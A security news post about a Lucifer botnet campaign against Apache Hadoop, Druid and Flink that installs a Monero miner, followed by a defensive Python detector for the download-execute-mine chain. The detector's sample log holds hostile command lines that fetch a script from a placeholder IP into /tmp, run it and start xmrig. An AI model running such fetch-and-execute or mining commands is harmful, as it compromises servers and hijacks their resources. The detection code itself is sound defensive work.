Apache at gunpoint: 3,000 attacks on Hadoop, Druid, and Flink over the past month

Who is behind the new malware campaign and what are its goals?

Aqua Security identified a new malware campaign targeting the Apache big data stack, specifically Hadoop, Druid, and Flink. Attackers exploit vulnerabilities and misconfigurations to launch these attacks, which were recorded in cloud-based honeypots. In the last month alone, more than three thousand of them were observed.

Apache is a well-known open source foundation that supports many projects. The official Apache website reports more than 320 active projects and 8,000 participants.

Attackers use a new version of the Lucifer DDoS botnet, known since 2020, which targets vulnerable Linux systems and turns them into bots that mine Monero.

To launch attacks, the campaign uses misconfigurations and old vulnerabilities, including CVE-2021-25646 in Apache Druid, which allows a remote unauthorized user to execute arbitrary JavaScript code with the server's privileges.

The campaign reviewed by the researchers consists of several stages: exploiting vulnerabilities or misconfigurations, downloading and executing the Lucifer malware, and then downloading and executing the main malicious component, the XMRig miner.

During the six months of monitoring, the campaign has evolved slightly, including changes in the mechanisms for delivering and executing malware.

To protect your organization, it is important to update your systems in a timely manner, configure them correctly, and follow the security guidelines. It is also worth using real-time detection and response solutions, exercising caution when using open-source libraries, and allocating enough time and resources to train employees.
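The staged chain described above (exploit, download and execute the loader, then download and execute the miner) and the real-time detection advice that follows it can be illustrated with a small detector. The script below is an added example, not code from the post or from Aqua Security's report. It assumes a constructed process-execution log format (timestamp, host, user, command line), assumed service-account names, and assumed staging directories; the only indicator taken from the post is the XMRig process name. It flags a host when a service account first fetches a file into a world-writable directory, then executes something from such a directory, and finally starts a process named xmrig, all within a short window.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed: accounts the Apache services run under on a typical deployment
SERVICE_ACCOUNTS = {"druid", "hadoop", "flink", "yarn"}
# Assumed: directories an unprivileged service account can write to and execute from
STAGED_PATH_RE = re.compile(r"(?:^|\s)(/(?:tmp|var/tmp|dev/shm)/\S+)")
DOWNLOAD_RE = re.compile(r"\b(wget|curl)\b")
# Process name taken from the post; the miner is the final stage of the chain
MINER_RE = re.compile(r"(?:^|/)xmrig(?:\s|$)")
ORDER = ["download", "execute", "miner"]
WINDOW = timedelta(minutes=10)

# Constructed sample events; node-a shows the full chain, node-b a benign admin download
SAMPLE_LOG = """\
2024-01-10T09:00:01Z node-a druid /usr/bin/java -cp ... org.apache.druid.cli.Main server broker
2024-01-10T09:03:12Z node-a druid /bin/sh -c wget -q http://203.0.113.10/x.sh -O /tmp/x.sh
2024-01-10T09:03:13Z node-a druid /bin/sh /tmp/x.sh
2024-01-10T09:03:20Z node-a druid /tmp/.x/xmrig -o pool.invalid:3333
2024-01-10T09:05:00Z node-b hadoop /usr/bin/java -cp ... org.apache.hadoop.yarn.server.nodemanager.NodeManager
2024-01-10T09:06:00Z node-b hadoop /bin/sh -c curl -s https://mirror.example/patch.tgz -o /opt/patch.tgz
"""


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    cmdline: str


def parse_events(text):
    """Parse the constructed 'timestamp host user cmdline' format."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split(" ", 3)
        events.append(ProcEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, cmdline))
    return events


def classify(cmdline):
    """Map one command line to a chain stage, or None if it looks unremarkable."""
    if MINER_RE.search(cmdline):
        return "miner"
    staged = STAGED_PATH_RE.search(cmdline)
    if DOWNLOAD_RE.search(cmdline):
        # A download only counts when it lands in a staging directory
        return "download" if staged else None
    if staged:
        # Interpreter plus staged path, or the staged path run directly
        return "execute"
    return None


def detect(text):
    """Return one finding per (host, user) that walked the chain in order within WINDOW."""
    by_key = {}
    for ev in parse_events(text):
        if ev.user not in SERVICE_ACCOUNTS:
            continue
        stage = classify(ev.cmdline)
        if stage is not None:
            by_key.setdefault((ev.host, ev.user), []).append((ev.ts, stage, ev.cmdline))

    findings = []
    for (host, user), evs in by_key.items():
        reached = {}
        for ts, stage, cmd in sorted(evs):
            idx = ORDER.index(stage)
            # A stage only counts once the previous stage has been seen
            if idx > 0 and ORDER[idx - 1] not in reached:
                continue
            if ts - reached.get("download", ts) > WINDOW:
                continue
            reached.setdefault(stage, ts)
        if "download" in reached and "execute" in reached:
            findings.append({
                "host": host,
                "user": user,
                "stages": reached,
                "verdict": "full_chain" if "miner" in reached else "partial",
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["verdict"], f["host"], f["user"], sorted(f["stages"]))
```

A `partial` verdict (download and execution from a staging directory without a miner) is still worth an alert, because the loader stage runs before the miner is fetched; the ordering and time-window checks keep an ordinary administrator download to `/opt` or a miner-named process with no preceding staging from raising a finding.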

This malicious operation highlights the need for careful attention to cybersecurity in the open-source Apache software environment, and underlines the importance of comprehensive protection and adherence to best practices for digital defense.